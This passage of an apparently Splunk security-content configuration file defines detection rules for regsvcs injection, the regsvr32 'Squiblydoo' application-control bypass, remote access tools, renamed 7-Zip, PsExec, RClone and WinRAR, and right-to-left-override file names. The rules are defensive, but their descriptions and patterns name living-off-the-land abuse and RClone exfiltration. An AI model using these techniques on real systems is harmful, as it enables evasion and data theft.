action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Although unlikely, limited instances of regsvcs.exe may cause a false positive. Filter based on endpoint usage, command line arguments, or process lineage.
action.escu.creation_date = 2022-03-15
action.escu.modification_date = 2022-03-15
action.escu.confidence = high
action.escu.full_search_name = ESCU - Detect Regsvcs with No Command Line Arguments - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Suspicious Regsvcs Regasm Activity", "Living Off The Land"]
action.risk = 1
action.risk.param._risk_message = The process $process_name$ was spawned by $parent_process_name$ without any command-line arguments on $dest$ by $user$.
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 49}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 49}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 49}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Detect Regsvcs with No Command Line Arguments - Rule
action.correlationsearch.annotations = {"analytic_story": ["Suspicious Regsvcs Regasm Activity", "Living Off The Land"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.009"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies regsvcs.exe with no command line arguments. This particular behavior occurs when another process injects into regsvcs.exe; in that case no command line arguments will be present. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. Regasm.exe and Regsvcs.exe are natively found in C:\Windows\Microsoft.NET\Framework\v*\regasm|regsvcs.exe and C:\Windows\Microsoft.NET\Framework64\v*\regasm|regsvcs.exe.
action.notable.param.rule_title = Detect Regsvcs with No Command Line Arguments
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Processes where `process_regsvcs` by _time span=1h Processes.process_id Processes.process_name Processes.dest Processes.user Processes.process_path Processes.process Processes.parent_process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | regex process="(?i)(regsvcs\.exe.{0,4}$)" | `detect_regsvcs_with_no_command_line_arguments_filter`

[ESCU - Detect Regsvr32 Application Control Bypass - Rule]
action.escu = 0
action.escu.enabled = 1
description = Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary. This variation of the technique is often referred to as a "Squiblydoo" attack. Upon investigating, look for network connections to remote destinations (internal or external). Be cautious when modifying the query to look for "scrobj.dll"; the ".dll" is not required to load scrobj. "scrobj.dll" will be loaded by "regsvr32.exe" upon execution.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.010"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary.This variation of the technique is often referred to as a "Squiblydoo" attack. \ Upon investigating, look for network connections to remote destinations (internal or external). Be cautious to modify the query to look for "scrobj.dll", the ".dll" is not required to load scrobj. "scrobj.dll" will be loaded by "regsvr32.exe" upon execution. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Limited false positives related to third party software registering .DLL's. 
action.escu.creation_date = 2023-07-10 action.escu.modification_date = 2023-07-10 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect Regsvr32 Application Control Bypass - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Living Off The Land", "Cobalt Strike", "BlackByte Ransomware", "Graceful Wipe Out Attack", "Suspicious Regsvr32 Activity"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ in an attempt to bypass detection and preventative controls was identified on endpoint $dest$ by user $user$. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 80}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 80}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 80}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Detect Regsvr32 Application Control Bypass - Rule action.correlationsearch.annotations = {"analytic_story": ["Living Off The Land", "Cobalt Strike", "BlackByte Ransomware", "Graceful Wipe Out Attack", "Suspicious Regsvr32 Activity"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.010"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = Adversaries may abuse Regsvr32.exe to proxy 
execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary.This variation of the technique is often referred to as a "Squiblydoo" attack. \ Upon investigating, look for network connections to remote destinations (internal or external). Be cautious to modify the query to look for "scrobj.dll", the ".dll" is not required to load scrobj. "scrobj.dll" will be loaded by "regsvr32.exe" upon execution. action.notable.param.rule_title = Detect Regsvr32 Application Control Bypass action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_regsvr32` Processes.process=*scrobj* by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.parent_process_name Processes.process Processes.original_file_name Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `detect_regsvr32_application_control_bypass_filter` [ESCU - Detect Remote Access Software Usage File - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects when a file from a known remote access software is written to disk within the environment. Adversaries use these utilities to retain remote access capabilities to the environment. Utilities in the lookup include AnyDesk, GoToMyPC, LogMeIn, TeamViewer and much more. Review the lookup for the entire list and add any others. 
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Command and Control"], "mitre_attack": ["T1219"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic detects when a file from a known remote access software is written to disk within the environment. Adversaries use these utilities to retain remote access capabilities to the environment. Utilities in the lookup include AnyDesk, GoToMyPC, LogMeIn, TeamViewer and much more. Review the lookup for the entire list and add any others. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the file path, file name, and the user that created the file. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Filesystem` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Known or approved applications used by the organization or usage of built-in functions. 
action.escu.creation_date = 2024-02-22 action.escu.modification_date = 2024-02-22 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect Remote Access Software Usage File - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Insider Threat", "Command And Control", "Ransomware"] action.risk = 1 action.risk.param._risk_message = A file for known a remote access software [$file_name$] was created on $dest$ by $user$. action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}, {"threat_object_field": "file_name", "threat_object_type": "file_name"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Detect Remote Access Software Usage File - Rule action.correlationsearch.annotations = {"analytic_story": ["Insider Threat", "Command And Control", "Ransomware"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Command and Control"], "mitre_attack": ["T1219"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count, min(_time) as firstTime, max(_time) as lastTime, values(Filesystem.file_path) as file_path from datamodel=Endpoint.Filesystem by Filesystem.dest, Filesystem.user, Filesystem.file_name | `security_content_ctime(firstTime)` | 
`security_content_ctime(lastTime)` | `drop_dm_object_name(Filesystem)` | lookup remote_access_software remote_utility AS file_name OUTPUT isutility, description as signature, comment_reference as desc, category | search isutility = TRUE | `detect_remote_access_software_usage_file_filter` [ESCU - Detect Remote Access Software Usage FileInfo - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects when process with file or code signing attributes from a known remote access software is executed with the environment. Adversaries use these utilities to retain remote access capabilities to the environment. Utilities in the lookup include AnyDesk, GoToMyPC, LogMeIn, TeamViewer and much more. Review the lookup for the entire list and add any others. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Command and Control"], "mitre_attack": ["T1219"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following analytic detects when process with file or code signing attributes from a known remote access software is executed with the environment. Adversaries use these utilities to retain remote access capabilities to the environment. Utilities in the lookup include AnyDesk, GoToMyPC, LogMeIn, TeamViewer and much more. Review the lookup for the entire list and add any others. action.escu.how_to_implement = This analytic relies on Sysmon to be properly installed and utilized in the environment. Ensure that proper logging is setup for Sysmon and data is being ingested into Splunk. action.escu.known_false_positives = Known or approved applications used by the organization or usage of built-in functions. 
action.escu.creation_date = 2024-02-22 action.escu.modification_date = 2024-02-22 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect Remote Access Software Usage FileInfo - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["Insider Threat", "Command And Control", "Ransomware"] action.risk = 1 action.risk.param._risk_message = A file attributes for known a remote access software [$process_name$] was detected on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}, {"threat_object_field": "process_name", "threat_object_type": "process"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Detect Remote Access Software Usage FileInfo - Rule action.correlationsearch.annotations = {"analytic_story": ["Insider Threat", "Command And Control", "Ransomware"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Command and Control"], "mitre_attack": ["T1219"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `sysmon` EventCode=1 | stats count min(_time) as firstTime max(_time) as lastTime, values(Company) as Company values(Product) as Product by dest, user, parent_process_name, process_name, process | lookup remote_access_software remote_utility_fileinfo AS Product OUTPUT isutility, description as signature, comment_reference as desc, category | search isutility = True | `detect_remote_access_software_usage_fileinfo_filter` [ESCU - Detect Remote Access 
Software Usage Process - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects when a known remote access software is executed within the environment. Adversaries use these utilities to retain remote access capabilities to the environment. Utilities in the lookup include AnyDesk, GoToMyPC, LogMeIn, TeamViewer and much more. Review the lookup for the entire list and add any others. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Command and Control"], "mitre_attack": ["T1219"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic detects when a known remote access software is executed within the environment. Adversaries use these utilities to retain remote access capabilities to the environment. Utilities in the lookup include AnyDesk, GoToMyPC, LogMeIn, TeamViewer and much more. Review the lookup for the entire list and add any others. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = It is possible that legitimate remote access software is used within the environment. Ensure that the lookup is reviewed and updated with any additional remote access software that is used within the environment. 
action.escu.creation_date = 2024-02-22 action.escu.modification_date = 2024-02-22 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect Remote Access Software Usage Process - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Insider Threat", "Command And Control", "Ransomware"] action.risk = 1 action.risk.param._risk_message = A process for a known remote access software $process_name$ was identified on $dest$. action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}, {"threat_object_field": "process_name", "threat_object_type": "process"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Detect Remote Access Software Usage Process - Rule action.correlationsearch.annotations = {"analytic_story": ["Insider Threat", "Command And Control", "Ransomware"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Command and Control"], "mitre_attack": ["T1219"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime values(Processes.parent_process) as parent_process from datamodel=Endpoint.Processes where Processes.dest!=unknown Processes.process!=unknown by Processes.dest Processes.user Processes.process_name 
Processes.process | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `drop_dm_object_name(Processes)` | lookup remote_access_software remote_utility AS process_name OUTPUT isutility, description as signature, comment_reference as desc, category | search isutility = True | `detect_remote_access_software_usage_process_filter` [ESCU - Detect Renamed 7-Zip - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies renamed 7-Zip usage using Sysmon. At this stage of an attack, review parallel processes and file modifications for data that is staged or potentially have been exfiltrated. This analytic utilizes the OriginalFileName to capture the renamed process. During triage, validate this is the legitimate version of `7zip` by reviewing the PE metadata. In addition, review parallel processes for further suspicious behavior. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1560.001", "T1560"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies renamed 7-Zip usage using Sysmon. At this stage of an attack, review parallel processes and file modifications for data that is staged or potentially have been exfiltrated. This analytic utilizes the OriginalFileName to capture the renamed process. During triage, validate this is the legitimate version of `7zip` by reviewing the PE metadata. In addition, review parallel processes for further suspicious behavior. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. 
These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Limited false positives, however this analytic will need to be modified for each environment if Sysmon is not used. action.escu.creation_date = 2021-09-16 action.escu.modification_date = 2021-09-16 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect Renamed 7-Zip - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Collection and Staging"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Detect Renamed 7-Zip - Rule action.correlationsearch.annotations = {"analytic_story": ["Collection and Staging"], "cis20": ["CIS 10"], "confidence": 90, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1560.001", "T1560"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.original_file_name=7z*.exe AND Processes.process_name!=7z*.exe) by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id 
Processes.original_file_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_renamed_7_zip_filter` [ESCU - Detect Renamed PSExec - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies renamed instances of `PsExec.exe` being utilized on an endpoint. Most instances, it is highly probable to capture `Psexec.exe` or other SysInternal utility usage with the command-line argument of `-accepteula`. During triage, validate this is the legitimate version of `PsExec` by reviewing the PE metadata. In addition, review parallel processes for further suspicious behavior. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1569", "T1569.002"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies renamed instances of `PsExec.exe` being utilized on an endpoint. Most instances, it is highly probable to capture `Psexec.exe` or other SysInternal utility usage with the command-line argument of `-accepteula`. During triage, validate this is the legitimate version of `PsExec` by reviewing the PE metadata. In addition, review parallel processes for further suspicious behavior. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. 
Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Limited false positives should be present. It is possible some third party applications may use older versions of PsExec, filter as needed. action.escu.creation_date = 2022-04-07 action.escu.modification_date = 2022-04-07 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect Renamed PSExec - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["SamSam Ransomware", "DHS Report TA18-074A", "HAFNIUM Group", "DarkSide Ransomware", "Active Directory Lateral Movement", "CISA AA22-320A", "Sandworm Tools", "BlackByte Ransomware", "DarkGate Malware", "Rhysida Ransomware"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Detect Renamed PSExec - Rule action.correlationsearch.annotations = {"analytic_story": ["SamSam Ransomware", "DHS Report TA18-074A", "HAFNIUM Group", "DarkSide Ransomware", "Active Directory Lateral Movement", "CISA AA22-320A", "Sandworm Tools", "BlackByte Ransomware", "DarkGate Malware", "Rhysida Ransomware"], "cis20": ["CIS 10"], "confidence": 90, "impact": 30, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1569", "T1569.002"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where 
(Processes.process_name!=psexec.exe OR Processes.process_name!=psexec64.exe) AND Processes.original_file_name=psexec.c by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.original_file_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_renamed_psexec_filter` [ESCU - Detect Renamed RClone - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies the usage of `rclone.exe`, renamed, being used to exfiltrate data to a remote destination. RClone has been used by multiple ransomware groups to exfiltrate data. In many instances, it will be downloaded from the legitimate site and executed accordingly. During triage, isolate the endpoint and begin to review parallel processes for additional behavior. At this stage, the adversary may have staged data to be exfiltrated. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1020"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies the usage of `rclone.exe`, renamed, being used to exfiltrate data to a remote destination. RClone has been used by multiple ransomware groups to exfiltrate data. In many instances, it will be downloaded from the legitimate site and executed accordingly. During triage, isolate the endpoint and begin to review parallel processes for additional behavior. At this stage, the adversary may have staged data to be exfiltrated. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. 
To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives should be limited as this analytic identifies renamed instances of `rclone.exe`. Filter as needed if there is a legitimate business use case. action.escu.creation_date = 2021-09-16 action.escu.modification_date = 2021-09-16 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect Renamed RClone - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["DarkSide Ransomware", "Ransomware"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Detect Renamed RClone - Rule action.correlationsearch.annotations = {"analytic_story": ["DarkSide Ransomware", "Ransomware"], "cis20": ["CIS 10"], "confidence": 90, "impact": 30, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1020"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where 
(Processes.original_file_name=rclone.exe AND Processes.process_name!=rclone.exe) by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.original_file_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_renamed_rclone_filter`

[ESCU - Detect Renamed WinRAR - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies renamed instances of `WinRAR.exe`. It is uncommon for WinRAR to run under a renamed binary; however, it is commonly installed by third-party applications and executed from a non-standard path. During triage, validate from the binary's additional metadata that this is `WinRAR`. Review parallel processes and file modifications.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1560.001", "T1560"], "nist": ["DE.AE"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The following analytic identifies renamed instances of `WinRAR.exe`. It is uncommon for WinRAR to run under a renamed binary; however, it is commonly installed by third-party applications and executed from a non-standard path. During triage, validate from the binary's additional metadata that this is `WinRAR`. Review parallel processes and file modifications.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Unknown. It is possible third-party applications use renamed instances of WinRAR.
action.escu.creation_date = 2021-09-16
action.escu.modification_date = 2021-09-16
action.escu.confidence = high
action.escu.full_search_name = ESCU - Detect Renamed WinRAR - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Collection and Staging", "CISA AA22-277A"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Detect Renamed WinRAR - Rule
action.correlationsearch.annotations = {"analytic_story": ["Collection and Staging", "CISA AA22-277A"], "cis20": ["CIS 10"], "confidence": 90, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1560.001", "T1560"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.original_file_name=WinRAR.exe (Processes.process_name!=rar.exe AND Processes.process_name!=winrar.exe) by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.original_file_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_renamed_winrar_filter`

[ESCU - Detect RTLO In File Name - Rule]
action.escu = 0
action.escu.enabled = 1
description = This search is used to detect the abuse of the right-to-left override (RTLO or RLO) character (U+202E). This technique is used by adversaries to disguise a string and/or file name to make it appear benign. The RTLO character is a non-printing Unicode character that causes the text that follows it to be displayed in reverse.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1036.002", "T1036"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This search is used to detect the abuse of the right-to-left override (RTLO or RLO) character (U+202E). This technique is used by adversaries to disguise a string and/or file name to make it appear benign. The RTLO character is a non-printing Unicode character that causes the text that follows it to be displayed in reverse.
action.escu.how_to_implement = To successfully implement this search you need to be ingesting process information that includes the full command line of the process being launched on your endpoints into the `Processes` node of the `Endpoint` datamodel. In addition, confirm the latest CIM App 4.20 or higher is installed and the latest TA for the endpoint product.
action.escu.known_false_positives = Deployments in regions where the native language is written right to left.
action.escu.creation_date = 2023-04-26
action.escu.modification_date = 2023-04-26
action.escu.confidence = high
action.escu.full_search_name = ESCU - Detect RTLO In File Name - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
